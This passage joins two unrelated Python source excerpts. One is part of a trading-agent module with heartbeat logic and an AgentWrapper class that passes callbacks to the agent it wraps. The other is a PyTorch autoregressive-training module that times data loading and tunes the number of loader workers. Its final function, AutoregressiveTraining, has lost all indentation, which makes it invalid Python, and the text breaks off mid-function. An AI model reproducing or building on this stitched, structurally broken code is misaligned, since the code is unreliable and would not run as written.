            there is any order update without receiving pings from the Front.
        '''
        if b_new:
            self._last_emptysettings = neutrino_now()
            # production
            if PROD:
                self.print_debug_msg(self._mlogs['pingok'], True)
        elif b_newordr:
            # NOTE(review): compares a timestamp against 420 (seconds?) while
            # the branch below compares elapsed time — confirm this is the
            # intended penalization rule.
            if self._last_emptysettings > 420:
                self._last_emptysettings -= 10
        elif neutrino_now() - self._last_emptysettings > 900:
            self._last_emptysettings = neutrino_now()
            # production
            if PROD:
                self.print_debug_msg(self._mlogs['pingfault'], True, True)
                self.set_offline()
                self._should_quit = True
                self.is_offline()
            # simulation
            pass
    def set_initial_positions(self, d_position):
        '''
        Set the initial position in each instrument traded by the agent. It
        should be passed as a JSON encoded as a string.
        e.g.: {"PETR4": {"Q": 1000, "P": 10.0}}. "P" is optional
        :param d_position: dict. position by instrument
        '''
        # d_position = json.loads(s_position)
        for s_symbol, d_pos in iter(d_position.items()):
            instr = self._instr_stack.get(s_symbol, None)
            if instr:
                instr.set_initial_positions(self, d_pos)
    def set_offline(self):
        '''
        Cancel all orders and do not send new ones
        '''
        self._done = True
        self.is_offline()
    def set_online(self):
        '''
        Enable the agent to send new orders
        '''
        self._no_msg_printed_yet = True
        self._done = False
class AgentWrapper(Agent):
    '''
    Wrapper representation of the agent that is used to transform it in a
    modular way. All Neutrino callbacks are delegated to the wrapped agent.
    '''
    # The wrapped Agent (or AgentWrapper) instance
    agent = None

    def __init__(self, agent):
        '''
        :param agent: Agent. The agent instance to wrap
        '''
        self.agent = agent
        self._ensure_no_double_wrap()
        self._baseagent = 'AgentWrapper'
        self.i_id = agent.i_id
        self._instr_from_conf = self.agent._instr_from_conf
        # self.initialize(self._instr_from_conf)

    def initialize(self, symbols=None):
        '''
        Initialize the wrapped agent and mirror its state on the wrapper
        :param symbols: list. Instrument list forwarded to the wrapped agent
        '''
        self.agent.initialize(symbols)
        if hasattr(self.agent, '_instr'):
            self._instr = self.agent._instr
            self._instr_stack = self.agent._instr_stack
            self._disable_bid = self.agent._disable_bid
            self._disable_ask = self.agent._disable_ask
            self._done = self.agent._done  # the agent start disabled
            self.f_time_to_debug = 0
            self._last_setoffline = self.agent._last_setoffline
            self._msg_offline = self.agent._msg_offline

    @classmethod
    def class_name(cls):
        '''Return the name of this wrapper class'''
        return cls.__name__

    def set_action_object(self, action_obj):
        '''Set the action object on the wrapped agent (simulation attribute)'''
        self.agent.action_obj = action_obj

    def _ensure_no_double_wrap(self):
        '''
        Walk the chain of wrapped agents and raise DoubleWrapperError if the
        same wrapper class appears twice
        '''
        # NOTE(review): self._mlogs is only set by Agent.initialize(); if a
        # double wrap is detected before initialize() runs, the lookup below
        # raises AttributeError instead — confirm intended.
        agent = self.agent
        while True:
            if isinstance(agent, AgentWrapper):
                if agent.class_name() == self.class_name():
                    s_err = self._mlogs['errwraper']
                    s_err = s_err.format(self.__class__.__name__)
                    raise DoubleWrapperError(s_err)
                agent = agent.agent
            else:
                break

    # Neutrino callbacks: pure delegation to the wrapped agent
    def symbolsLoaded(self):
        return self.agent.symbolsLoaded()

    def bidSide(self, source, book):
        return self.agent.bidSide(source, book)

    def askSide(self, source, book):
        return self.agent.askSide(source, book)

    def orderFilled(self, order, lastpx, lastqty):
        return self.agent.orderFilled(order, lastpx, lastqty)

    def orderUpdated(self, order, rejected=''):
        # BUG FIX: the rejection reason was previously dropped here
        # (self.agent.orderUpdated(order)), so wrapped agents never saw why
        # an order was rejected; forward it like every other callback.
        return self.agent.orderUpdated(order, rejected)

    def command(self, source, s_command):
        return self.agent.command(source, s_command)

    def setOffline(self):
        return self.agent.setOffline()

    def indicatorData(self, raw_data):
        return self.agent.indicatorData(raw_data)

    def processSetParameters(self, s_param):
        return self.agent.processSetParameters(s_param)

    def processGetParameters(self):
        return self.agent.processGetParameters()

    def processQuit(self):
        return self.agent.processQuit()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jan 3 18:42:12 2021
@author: ghiggi
"""
import os
import torch
import time
import pickle
import dask
import numpy as np
from tabulate import tabulate
from modules.dataloader_autoregressive import AutoregressiveDataset
from modules.dataloader_autoregressive import AutoregressiveDataLoader
from modules.dataloader_autoregressive import get_aligned_ar_batch
from modules.dataloader_autoregressive import remove_unused_Y
from modules.dataloader_autoregressive import cylic_iterator
from modules.utils_autoregressive import check_ar_settings
from modules.utils_autoregressive import check_input_k
from modules.utils_autoregressive import check_output_k
from modules.utils_training import AR_TrainingInfo
from modules.utils_torch import check_device
from modules.utils_torch import check_pin_memory
from modules.utils_torch import check_asyncronous_gpu_transfer
from modules.utils_torch import check_prefetch_in_gpu
from modules.utils_torch import check_prefetch_factor
from modules.utils_torch import check_ar_training_strategy
from modules.utils_torch import get_time_function
from modules.utils_xr import xr_is_aligned
from modules.loss import reshape_tensors_4_loss
from modules.utils_swag import bn_update_with_loader
##----------------------------------------------------------------------------.
# TODOs
# - ONNX for saving model weights
# - Record the loss per variable
# - Compute additional metrics (R2, bias, rsd)
#-----------------------------------------------------------------------------.
# ############################
#### Autotune num_workers ####
# ############################
def timing_AR_Training(dataset,
                       model,
                       optimizer,
                       criterion,
                       ar_scheduler,
                       ar_training_strategy = "AR",
                       # DataLoader options
                       batch_size = 32,
                       shuffle = True,
                       shuffle_seed = 69,
                       num_workers = 0,
                       prefetch_in_gpu = False,
                       prefetch_factor = 2,
                       pin_memory = False,
                       asyncronous_gpu_transfer = True,
                       # Timing options
                       training_mode = True,
                       n_repetitions = 10,
                       verbose = True):
    """
    Time execution and memory consumption of AR training.
    Parameters
    ----------
    dataset : AutoregressiveDataset
        AutoregressiveDataset
    model : pytorch model
        pytorch model.
    optimizer : pytorch optimizer
        pytorch optimizer.
    criterion : pytorch criterion
        pytorch criterion
    ar_scheduler :
        Scheduler regulating the changes in loss weights (per AR iteration)
        during RNN/AR training.
    ar_training_strategy : str, optional
        Either "AR" or "RNN".
        "AR" performs the backward pass at each AR iteration.
        "RNN" performs the backward pass after all AR iterations.
        The default is "AR".
    num_workers : 0, optional
        Number of processes that generate batches in parallel.
        0 means ONLY the main process will load batches (that can be a bottleneck).
        1 means ONLY one worker (just not the main process) will load data
        A high enough number of workers usually assures that CPU computations
        are efficiently managed. However, increasing num_workers increase the
        CPU memory consumption.
        The Dataloader prefetch into the CPU prefetch_factor*num_workers batches.
        The default is 0.
    batch_size : int, optional
        Number of samples within a batch. The default is 32.
    shuffle : bool, optional
        Whether to random shuffle the samples at each epoch or when ar_iterations are updated.
        The default is True.
    shuffle_seed : int, optional
        Empower deterministic random shuffling.
        The shuffle_seed is increased by 1 when ar_iterations are updated.
    prefetch_factor: int, optional
        Number of sample loaded in advance by each worker.
        The default is 2.
    prefetch_in_gpu: bool, optional
        Whether to prefetch 'prefetch_factor'*'num_workers' batches of data into GPU instead of CPU.
        By default it prefetch 'prefetch_factor'*'num_workers' batches of data into CPU (when False)
        The default is False.
    pin_memory : bool, optional
        When True, it prefetch the batch data into the pinned memory.
        pin_memory=True enables (asynchronous) fast data transfer to CUDA-enabled GPUs.
        Useful only if training on GPU.
        The default is False.
    asyncronous_gpu_transfer: bool, optional
        Only used if 'prefetch_in_gpu' = True.
        Indicates whether to transfer data into GPU asynchronously
    training_mode : bool, optional
        Whether to compute the gradients or time the "validation mode".
        The default is True.
    n_repetitions : int, optional
        Number of runs to time. The default is 10.
    verbose : bool, optional
        Whether to print the timing summary. The default is True.
    Returns
    -------
    timing_info : dict
        Dictionary with timing information of AR training.
    memory_info : dict
        Dictionary with memory consumption (in MB) of model parameters, batch
        and forward pass (non-zero only when running on GPU).
    """
    ##------------------------------------------------------------------------.
    # Check at least 1 pass is done
    if n_repetitions < 1:
        n_repetitions = 1
    ##------------------------------------------------------------------------.
    if not isinstance(num_workers, int):
        raise TypeError("'num_workers' must be a integer larger than 0.")
    if num_workers < 0:
        raise ValueError("'num_workers' must be a integer larger than 0.")
    if not isinstance(training_mode, bool):
        raise TypeError("'training_mode' must be either True or False.")
    ##------------------------------------------------------------------------.
    # Retrieve information
    ar_iterations = dataset.ar_iterations
    device = dataset.device
    # Retrieve function to get time (CUDA-synchronized on GPU)
    get_time = get_time_function(device)
    # Retrieve custom ar_batch_fun function
    ar_batch_fun = dataset.ar_batch_fun
    ##------------------------------------------------------------------------.
    # Get dimension infos
    dim_info = dataset.dim_info
    feature_info = dataset.feature_info
    dim_info_dynamic = dim_info['dynamic']
    # feature_names_dynamic = list(feature_info['dynamic'])
    ##------------------------------------------------------------------------.
    # Initialize model
    if training_mode:
        model.train()
    else:
        model.eval()
    ##------------------------------------------------------------------------.
    # Initialize list
    Dataloader_timing = []
    ar_batch_timing = []
    ar_data_removal_timing = []
    ar_forward_timing = []
    ar_loss_timing = []
    Backprop_timing = []
    Total_timing = []
    ##-------------------------------------------------------------------------.
    # Initialize DataLoader
    trainingDataLoader = AutoregressiveDataLoader(dataset = dataset,
                                                  batch_size = batch_size,
                                                  drop_last_batch = True,
                                                  shuffle = shuffle,
                                                  shuffle_seed = shuffle_seed,
                                                  num_workers = num_workers,
                                                  prefetch_factor = prefetch_factor,
                                                  prefetch_in_gpu = prefetch_in_gpu,
                                                  pin_memory = pin_memory,
                                                  asyncronous_gpu_transfer = asyncronous_gpu_transfer,
                                                  device = device)
    trainingDataLoader_iter = iter(trainingDataLoader)
    ##-------------------------------------------------------------------------.
    # Measure the size of model parameters (MB); 0 when running on CPU
    if device.type != 'cpu':
        model_params_size = torch.cuda.memory_allocated()/1000/1000
    else:
        model_params_size = 0
    ##-------------------------------------------------------------------------.
    # Repeat training n_repetitions
    with torch.set_grad_enabled(training_mode):
        for count in range(n_repetitions):
            t_start = get_time()
            # Retrieve batch
            t_i = get_time()
            training_batch_dict = next(trainingDataLoader_iter)
            Dataloader_timing.append(get_time() - t_i)
            # Perform AR iterations
            dict_training_Y_predicted = {}
            dict_training_loss_per_ar_iteration = {}
            ##---------------------------------------------------------------------.
            # Initialize stuff for AR loop timing
            tmp_ar_data_removal_timing = 0
            tmp_ar_batch_timing = 0
            tmp_ar_forward_timing = 0
            tmp_ar_loss_timing = 0
            tmp_ar_backprop_timing = 0
            batch_memory_size = 0
            for ar_iteration in range(ar_iterations+1):
                # Retrieve X and Y for current AR iteration
                t_i = get_time()
                torch_X, torch_Y = ar_batch_fun(ar_iteration = ar_iteration,
                                                batch_dict = training_batch_dict,
                                                dict_Y_predicted = dict_training_Y_predicted,
                                                device = device,
                                                asyncronous_gpu_transfer = asyncronous_gpu_transfer)
                tmp_ar_batch_timing = tmp_ar_batch_timing + (get_time() - t_i)
                ##-----------------------------------------------------------------.
                # Measure model parameters + batch size in MB
                if device.type != 'cpu' and ar_iteration == 0:
                    batch_memory_size = torch.cuda.memory_allocated()/1000/1000 - model_params_size
                ##-----------------------------------------------------------------.
                # Forward pass and store output for stacking into next AR iterations
                t_i = get_time()
                dict_training_Y_predicted[ar_iteration] = model(torch_X)
                tmp_ar_forward_timing = tmp_ar_forward_timing + (get_time() - t_i)
                ##-----------------------------------------------------------------.
                # Compute loss for current forecast iteration
                # - The criterion currently expects [data_points, nodes, features]
                #   So we collapse all other dimensions to a 'data_points' dimension
                # TODO to generalize AR_Training to whatever tensor formats:
                # - reshape_tensors_4_loss should be done in criterion
                # - criterion should get args: dim_info, dynamic_features,
                # - criterion can perform internally "per-variable loss", "per-variable masking"
                t_i = get_time()
                Y_pred, Y_obs = reshape_tensors_4_loss(Y_pred = dict_training_Y_predicted[ar_iteration],
                                                       Y_obs = torch_Y,
                                                       dim_info_dynamic = dim_info_dynamic)
                dict_training_loss_per_ar_iteration[ar_iteration] = criterion(Y_obs, Y_pred)
                tmp_ar_loss_timing = tmp_ar_loss_timing + (get_time() - t_i)
                ##-----------------------------------------------------------------.
                # If ar_training_strategy is "AR", perform backward pass at each AR iteration
                if ar_training_strategy == "AR":
                    # - Detach gradient of Y_pred (to avoid RNN-style optimization)
                    if training_mode:
                        dict_training_Y_predicted[ar_iteration] = dict_training_Y_predicted[ar_iteration].detach() # TODO: should not be detached after backward?
                    # - AR weight the loss (aka weight sum the gradients ...)
                    t_i = get_time()
                    dict_training_loss_per_ar_iteration[ar_iteration] = dict_training_loss_per_ar_iteration[ar_iteration]*ar_scheduler.ar_weights[ar_iteration]
                    tmp_ar_loss_timing = tmp_ar_loss_timing + (get_time() - t_i)
                    # - Measure model size requirements
                    if device.type != 'cpu':
                        model_memory_allocation = torch.cuda.memory_allocated()/1000/1000
                    else:
                        model_memory_allocation = 0
                    # - Backpropagate to compute gradients (the derivative of the loss w.r.t. the parameters)
                    if training_mode:
                        t_i = get_time()
                        dict_training_loss_per_ar_iteration[ar_iteration].backward()
                        tmp_ar_backprop_timing = tmp_ar_backprop_timing + (get_time() - t_i)
                    # - Update the total (AR weighted) loss
                    t_i = get_time()
                    if ar_iteration == 0:
                        training_total_loss = dict_training_loss_per_ar_iteration[ar_iteration]
                    else:
                        training_total_loss += dict_training_loss_per_ar_iteration[ar_iteration]
                    tmp_ar_loss_timing = tmp_ar_loss_timing + (get_time() - t_i)
                ##------------------------------------------------------------.
                # Remove unnecessary stored Y predictions
                t_i = get_time()
                remove_unused_Y(ar_iteration = ar_iteration,
                                dict_Y_predicted = dict_training_Y_predicted,
                                dict_Y_to_remove = training_batch_dict['dict_Y_to_remove'])
                del Y_pred, Y_obs, torch_X, torch_Y
                if ar_iteration == ar_iterations:
                    del dict_training_Y_predicted
                tmp_ar_data_removal_timing = tmp_ar_data_removal_timing + (get_time()- t_i)
            ##-------------------------------------------------------------------.
            # If ar_training_strategy is RNN, perform backward pass after all AR iterations
            if ar_training_strategy == "RNN":
                t_i = get_time()
                # - Compute total (AR weighted) loss
                for i, (ar_iteration, loss) in enumerate(dict_training_loss_per_ar_iteration.items()):
                    if i == 0:
                        training_total_loss = ar_scheduler.ar_weights[ar_iteration] * loss
                    else:
                        training_total_loss += ar_scheduler.ar_weights[ar_iteration] * loss
                tmp_ar_loss_timing = tmp_ar_loss_timing + (get_time() - t_i)
                # - Measure model size requirements
                if device.type != 'cpu':
                    model_memory_allocation = torch.cuda.memory_allocated()/1000/1000
                else:
                    model_memory_allocation = 0
                if training_mode:
                    # - Perform backward pass
                    t_i = get_time()
                    training_total_loss.backward()
                    tmp_ar_backprop_timing = tmp_ar_backprop_timing + (get_time() - t_i)
            ##--------------------------------------------------------------------.
            # Update the network weights
            if training_mode:
                t_i = get_time()
                # - Update the network weights
                optimizer.step()
                ##----------------------------------------------------------------.
                # Zeros all the gradients for the next batch training
                # - By default gradients are accumulated in buffers (and not overwritten)
                optimizer.zero_grad(set_to_none=True)
                tmp_ar_backprop_timing = tmp_ar_backprop_timing + (get_time() - t_i)
            ##--------------------------------------------------------------------.
            # Summarize timing
            ar_batch_timing.append(tmp_ar_batch_timing)
            ar_data_removal_timing.append(tmp_ar_data_removal_timing)
            ar_forward_timing.append(tmp_ar_forward_timing)
            ar_loss_timing.append(tmp_ar_loss_timing)
            Backprop_timing.append(tmp_ar_backprop_timing)
            ##--------------------------------------------------------------------.
            # - Total time elapsed
            Total_timing.append(get_time() - t_start)
    ##------------------------------------------------------------------------.
    # Create timing info dictionary
    timing_info = {'Run': list(range(n_repetitions)),
                   'Total': Total_timing,
                   'Dataloader': Dataloader_timing,
                   'AR Batch': ar_batch_timing,
                   'Delete': ar_data_removal_timing,
                   'Forward': ar_forward_timing,
                   'Loss': ar_loss_timing,
                   'Backward': Backprop_timing}
    ##-------------------------------------------------------------------------.
    # NOTE(review): model_memory_allocation is only assigned in the "AR" and
    # "RNN" branches above — any other ar_training_strategy value would raise
    # NameError here; confirm upstream validation guarantees AR/RNN.
    memory_info = {'Model parameters': model_params_size,
                   'Batch': batch_memory_size,
                   'Forward pass': model_memory_allocation}
    ##-------------------------------------------------------------------------.
    # Create timing table
    if verbose:
        table = []
        headers = ['Run', 'Total', 'Dataloader','AR Batch', 'Delete', 'Forward', 'Loss', 'Backward']
        for count in range(n_repetitions):
            table.append([count,
                          round(Total_timing[count], 4),
                          round(Dataloader_timing[count], 4),
                          round(ar_batch_timing[count], 4),
                          round(ar_data_removal_timing[count], 4),
                          round(ar_forward_timing[count], 4),
                          round(ar_loss_timing[count], 4),
                          round(Backprop_timing[count], 4)
                          ])
        print(tabulate(table, headers=headers))
        if device.type != 'cpu':
            print("- Model parameters requires {:.2f} MB in GPU".format(memory_info['Model parameters']))
            print("- A batch with {} samples for {} AR iterations allocate {:.2f} MB in GPU".format(batch_size, ar_iterations, memory_info['Batch']))
            print("- The model forward pass allocates {:.2f} MB in GPU.".format(memory_info['Forward pass']))
    ##------------------------------------------------------------------------.
    ### Reset model to training mode
    # NOTE(review): unconditional — the model is left in train() mode even
    # when timed with training_mode=False; confirm callers expect this.
    model.train()
    ##------------------------------------------------------------------------.
    ### Delete Dataloader to avoid deadlocks
    del trainingDataLoader_iter
    del trainingDataLoader
    ##------------------------------------------------------------------------.
    return timing_info, memory_info
def tune_num_workers(dataset,
                     model,
                     optimizer,
                     criterion,
                     num_workers_list,
                     ar_scheduler,
                     ar_training_strategy = "AR",
                     # DataLoader options
                     batch_size = 32,
                     shuffle = True,
                     shuffle_seed = 69,
                     prefetch_in_gpu = False,
                     prefetch_factor = 2,
                     pin_memory = False,
                     asyncronous_gpu_transfer = True,
                     # Timing options
                     training_mode = True,
                     n_repetitions = 10,
                     n_pass_to_skip = 4,
                     summary_stat = "max",
                     verbose = True):
    """
    Search for the best value of 'num_workers'.

    Times AR training (or validation) for each candidate in 'num_workers_list'
    and selects the candidate with the lowest summarized dataloader timing.

    Parameters
    ----------
    dataset : AutoregressiveDataset
        AutoregressiveDataset
    model : pytorch model
        pytorch model.
    optimizer : pytorch optimizer
        pytorch optimizer.
    criterion : pytorch criterion
        pytorch criterion
    num_workers_list : list
        A list of num_workers to time.
    ar_scheduler :
        Scheduler regulating the changes in loss weights (per AR iteration) during RNN/AR training
    ar_training_strategy : str
        Either "AR" or "RNN".
        "AR" performs the backward pass at each AR iteration.
        "RNN" performs the backward pass after all AR iterations.
    batch_size : int, optional
        Number of samples within a batch. The default is 32.
    shuffle : bool, optional
        Whether to shuffle the samples. The default is True.
    shuffle_seed : int, optional
        Seed controlling the sample shuffling. The default is 69.
    prefetch_factor : int, optional
        Number of samples loaded in advance by each worker.
        The default is 2.
    prefetch_in_gpu : bool, optional
        Whether to prefetch 'prefetch_factor'*'num_workers' batches of data into GPU instead of CPU.
        By default it prefetches 'prefetch_factor'*'num_workers' batches of data into CPU (when False).
        The default is False.
    pin_memory : bool, optional
        When True, it prefetches the batch data into the pinned memory.
        pin_memory=True enables (asynchronous) fast data transfer to CUDA-enabled GPUs.
        Useful only if training on GPU.
        The default is False.
    asyncronous_gpu_transfer : bool, optional
        Only used if 'prefetch_in_gpu' = True.
        Indicates whether to transfer data into GPU asynchronously.
    training_mode : bool, optional
        Whether to compute the gradients or time the "validation mode".
        The default is True.
    n_repetitions : int, optional
        Number of runs to time. The default is 10.
    n_pass_to_skip : int, optional
        Number of initial batch passes excluded from the timings.
        This avoids timing also the worker initialization when num_workers > 0.
        The default is 4.
    summary_stat : str, optional
        Statistical function used to summarize the timings.
        The default is 'max'.
        Valid values are ('min','mean','median','max').
        The first 'n_pass_to_skip' batch passes are excluded because they might not
        be representative of the actual performance (workers initializations).
    verbose : bool, optional
        Whether to print the timing summary. The default is True.

    Returns
    -------
    optimal_num_workers : int
        Optimal num_workers to use for efficient data loading.
    """
    ##------------------------------------------------------------------------.
    # Ensure a non-negative number of skipped passes, then enlarge the number
    # of repetitions so that 'n_repetitions' timed passes remain after skipping.
    if n_pass_to_skip < 0:
        n_pass_to_skip = 0
    n_repetitions = n_repetitions + n_pass_to_skip
    ##------------------------------------------------------------------------.
    # Checks arguments
    if isinstance(num_workers_list, int):
        num_workers_list = [num_workers_list]
    if len(num_workers_list) == 0:
        # Fail early with a clear message instead of an opaque np.argmin error.
        raise ValueError("'num_workers_list' must contain at least one value.")
    # Define summary statistic (dict dispatch instead of an if/elif chain)
    summary_funs = {"median": np.median,
                    "max": np.max,
                    "min": np.min,
                    "mean": np.mean}
    if summary_stat not in summary_funs:
        raise ValueError("Valid summary_stat values are ('min','mean','median','max').")
    summary_fun = summary_funs[summary_stat]
    ##------------------------------------------------------------------------.
    # Initialize per-num_workers timing/memory dictionaries
    Dataloader_timing = {i: [] for i in num_workers_list}
    ar_batch_timing = {i: [] for i in num_workers_list}
    ar_data_removal_timing = {i: [] for i in num_workers_list}
    ar_forward_timing = {i: [] for i in num_workers_list}
    ar_loss_timing = {i: [] for i in num_workers_list}
    Backprop_timing = {i: [] for i in num_workers_list}
    Total_timing = {i: [] for i in num_workers_list}
    Memory_Info = {i: [] for i in num_workers_list}
    ##------------------------------------------------------------------------.
    # Time AR training for specified num_workers in num_workers_list
    for num_workers in num_workers_list:
        timing_info, memory_info = timing_AR_Training(dataset = dataset,
                                                      model = model,
                                                      optimizer = optimizer,
                                                      criterion = criterion,
                                                      ar_scheduler = ar_scheduler,
                                                      ar_training_strategy = ar_training_strategy,
                                                      # DataLoader options
                                                      batch_size = batch_size,
                                                      shuffle = shuffle,
                                                      shuffle_seed = shuffle_seed,
                                                      num_workers = num_workers,
                                                      prefetch_in_gpu = prefetch_in_gpu,
                                                      prefetch_factor = prefetch_factor,
                                                      pin_memory = pin_memory,
                                                      asyncronous_gpu_transfer = asyncronous_gpu_transfer,
                                                      # Timing options
                                                      training_mode = training_mode,
                                                      n_repetitions = n_repetitions,
                                                      verbose = False)
        # Discard the first 'n_pass_to_skip' passes (worker warm-up)
        Dataloader_timing[num_workers] = timing_info['Dataloader'][n_pass_to_skip:]
        ar_batch_timing[num_workers] = timing_info['AR Batch'][n_pass_to_skip:]
        ar_data_removal_timing[num_workers] = timing_info['Delete'][n_pass_to_skip:]
        ar_forward_timing[num_workers] = timing_info['Forward'][n_pass_to_skip:]
        ar_loss_timing[num_workers] = timing_info['Loss'][n_pass_to_skip:]
        Backprop_timing[num_workers] = timing_info['Backward'][n_pass_to_skip:]
        Total_timing[num_workers] = timing_info['Total'][n_pass_to_skip:]
        Memory_Info[num_workers] = memory_info
    ##------------------------------------------------------------------------.
    ### Summarize timing results
    headers = ['N. workers', 'Total', 'Dataloader','AR Batch', 'Delete', 'Forward', 'Loss', 'Backward']
    table = []
    dtloader = []
    for num_workers in num_workers_list:
        # Compute the dataloader summary once and reuse it in the table row
        dataloader_summary = summary_fun(Dataloader_timing[num_workers]).round(4)
        dtloader.append(dataloader_summary)
        table.append([num_workers,
                      summary_fun(Total_timing[num_workers]).round(4),
                      dataloader_summary,
                      summary_fun(ar_batch_timing[num_workers]).round(4),
                      summary_fun(ar_data_removal_timing[num_workers]).round(4),
                      summary_fun(ar_forward_timing[num_workers]).round(4),
                      summary_fun(ar_loss_timing[num_workers]).round(4),
                      summary_fun(Backprop_timing[num_workers]).round(4)])
    ##------------------------------------------------------------------------.
    # Select the num_workers with the lowest summarized dataloader timing
    optimal_num_workers = num_workers_list[np.argmin(dtloader)]
    ##------------------------------------------------------------------------.
    # Print timing results
    if verbose:
        print(tabulate(table, headers=headers))
        if dataset.device.type != 'cpu':
            memory_info = Memory_Info[optimal_num_workers]
            print("- Model parameters requires {:.2f} MB in GPU.".format(memory_info['Model parameters']))
            print("- A batch with {} samples for {} AR iterations allocate {:.2f} MB in GPU.".format(batch_size, dataset.ar_iterations, memory_info['Batch']))
            print("- The model forward pass allocates {:.2f} MB in GPU.".format(memory_info['Forward pass']))
    ##------------------------------------------------------------------------.
    return optimal_num_workers
#----------------------------------------------------------------------------.
# #########################
#### Training function ####
# #########################
def AutoregressiveTraining(model,
model_fpath,
# Loss settings
criterion,
ar_scheduler,
early_stopping,
optimizer,
# Data
training_data_dynamic,
training_data_bc = None,
data_static = None,
validation_data_dynamic = None,
validation_data_bc = None,
bc_generator = None,
scaler = None,
# AR_batching_function
ar_batch_fun = get_aligned_ar_batch,
# Dataloader options
prefetch_in_gpu = False,
prefetch_factor = 2,
drop_last_batch = True,
shuffle = True,
shuffle_seed = 69,
num_workers = 0,
autotune_num_workers = False,
pin_memory = False,
asyncronous_gpu_transfer = True,
# Autoregressive settings
input_k = [-3,-2,-1],
output_k = [0],
forecast_cycle = 1,
ar_iterations = 6,
stack_most_recent_prediction = True,
# Training settings
ar_training_strategy = "AR",
lr_scheduler = None,
training_batch_size = 128,
validation_batch_size = 128,
epochs = 10,
scoring_interval = 10,
save_model_each_epoch = False,
ar_training_info = None,
# SWAG settings
swag = False,
swag_model = None,
swag_freq = 10,
swa_start = 8,
# GPU settings
device = 'cpu'):
"""AutoregressiveTraining.
ar_batch_fun : callable
Custom function that batch/stack together data across AR iterations.
The custom function must return a tuple of length 2 (X, Y), but X and Y
can be whatever desired objects (torch.Tensor, dict of Tensor, ...).
The custom function must have the following arguments:
def ar_batch_fun(ar_iteration, batch_dict, dict_Y_predicted,
device = 'cpu', asyncronous_gpu_transfer = True)
The default ar_batch_fun function is the pre-implemented get_aligned_ar_batch() which return
two torch.Tensor: one for X (input) and one four Y (output). Such function expects
the dynamic and bc batch data to have same dimensions and shape.
if early_stopping=None, no ar_iteration update
"""
with dask.config.set(scheduler='synchronous'):
##------------------------------------------------------------------------.
time_start_training = time.time()
## Checks arguments
device = check_device(device)
pin_memory = check_pin_memory(pin_memory=pin_memory, num_workers=num_workers, device=device)
asyncronous_gpu_transfer = check_asyncronous_gpu_transfer(asyncronous_gpu_transfer=asyncronous_gpu_transfer, device=device)
prefetch_in_gpu = check_prefetch_in_gpu(prefetch_in_gpu=prefetch_in_gpu, num_workers=num_workers, device=device)
prefetch_factor = check_prefetch_factor(prefetch_factor=prefetch_factor, num_workers=num_workers)
ar_training_strategy = check_ar_training_strategy(ar_training_strategy)
##------------------------------------------------------------------------.
# Check ar_scheduler
if len(ar_scheduler.ar_weights) > ar_iterations+1:
raise ValueError("The AR scheduler has {} AR weights, but ar_iterations is specified to be {}".format(len(ar_scheduler.ar_weights), ar_iterations))
if ar_iterations == 0:
if ar_scheduler.method != "constant":
print("Since 'ar_iterations' is 0, ar_scheduler 'method' is changed to 'constant'.")
ar_scheduler.method = "constant"
##------------------------------------------------------------------------.
# Check that autoregressive settings are valid
# - input_k and output_k must be numpy arrays hereafter !
print("- Defining AR settings:")
input_k = check_input_k(input_k=input_k, ar_iterations=ar_iterations)
output_k = check_output_k(output_k=output_k)
check_ar_settings(input_k = input_k,
output_k = output_k,
forecast_cycle = forecast_cycle,
ar_iterations = ar_iterations,
stack_most_recent_prediction = stack_most_recent_prediction)
##------------------------------------------------------------------------.
# Check training data
if training_data_dynamic is None:
raise ValueError("'training_data_dynamic' must be provided !")
##------------------------------------------------------------------------.
## Check validation data
if validation_data_dynamic is not None:
if not xr_is_aligned(training_data_dynamic, validation_data_dynamic, exclude="time"):
raise ValueError("training_data_dynamic' and 'validation_data_dynamic' does not"
"share same dimensions (order and values)(excluding 'time').")
if validation_data_bc is not None:
if training_data_dynamic is None:
raise ValueError("If 'validation_data_bc' is provided, also 'training_data_dynamic' must be specified.")
if not xr_is_aligned(training_data_bc, validation_data_bc, exclude="time"):
raise ValueError("training_data_bc' and 'validation_data_bc' does not"
"share same dimensions (order and values)(excluding 'time').")
##------------------------------------------------------------------------.
## Check early stopping
if validation_data_dynamic is None:
if early_stopping is not None:
if early_stopping.stopping_metric == "total_validation_loss":
print("Validation dataset is not provided."
"Stopping metric of early_stopping set to 'total_training_loss'")
early_stopping.stopping_metric = "total_training_loss"
##------------------------------------------------------------------------.
## Decide wheter to tune num_workers
if autotune_num_workers and (num_workers > 0):
num_workers_list = list(range(0, num_workers))
else:
num_workers_list = [num_workers]
##------------------------------------------------------------------------.
# Ensure criterion and model are on device
model.to(device)
criterion.to(device)
##------------------------------------------------------------------------.
# Zeros gradients
optimizer.zero_grad(set_to_none=True)
##------------------------------------------------------------------------.
### Create Datasets
t_i = time.time()
trainingDataset = AutoregressiveDataset(data_dynamic = training_data_dynamic,
data_bc = training_data_bc,
data_static = data_static,
bc_generator = bc_generator,
scaler = scaler,
# Custom AR batching function
ar_batch_fun = ar_batch_fun,
training_mode = True,
# Autoregressive settings
input_k = input_k,
output_k = output_k,
forecast_cycle = forecast_cycle,
ar_iterations = ar_scheduler.current_ar_iterations,
stack_most_recent_prediction = stack_most_recent_prediction,
# GPU settings
device = device)
if validation_data_dynamic is not None:
validationDataset = AutoregressiveDataset(data_dynamic = validation_data_dynamic,
data_bc = validation_data_bc,
data_static = data_static,
bc_generator = bc_generator,
scaler = scaler,
# Custom AR batching function
ar_batch_fun = ar_batch_fun,
training_mode = True,
# Autoregressive settings
input_k = input_k,
output_k = output_k,
forecast_cycle = forecast_cycle,
ar_iterations = ar_scheduler.current_ar_iterations,
stack_most_recent_prediction = stack_most_recent_prediction,
# GPU settings
device = device)
else:
validationDataset = None
print('- Creation of AutoregressiveDatasets: {:.0f}s'.format(time.time() - t_i))
##------------------------------------------------------------------------.
### Time execution
# - Time AR training
print("- Timing AR training with {} AR iterations:".format(trainingDataset.ar_iterations))
training_num_workers = tune_num_workers(dataset = trainingDataset,
model = model,
optimizer = optimizer,
criterion = criterion,
num_workers_list = num_workers_list,
ar_scheduler = ar_scheduler,
ar_training_strategy = ar_training_strategy,
# DataLoader options
batch_size = training_batch_size,
shuffle = shuffle,
shuffle_seed = shuffle_seed, # This cause training on same batch n_repetitions times
prefetch_in_gpu = prefetch_in_gpu,
prefetch_factor = prefetch_factor,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
# Timing options
training_mode = True,
n_repetitions = 5,
verbose = True)
print(' --> Selecting num_workers={} for TrainingDataLoader.'.format(training_num_workers))
# - Time AR validation
if validationDataset is not None:
print()
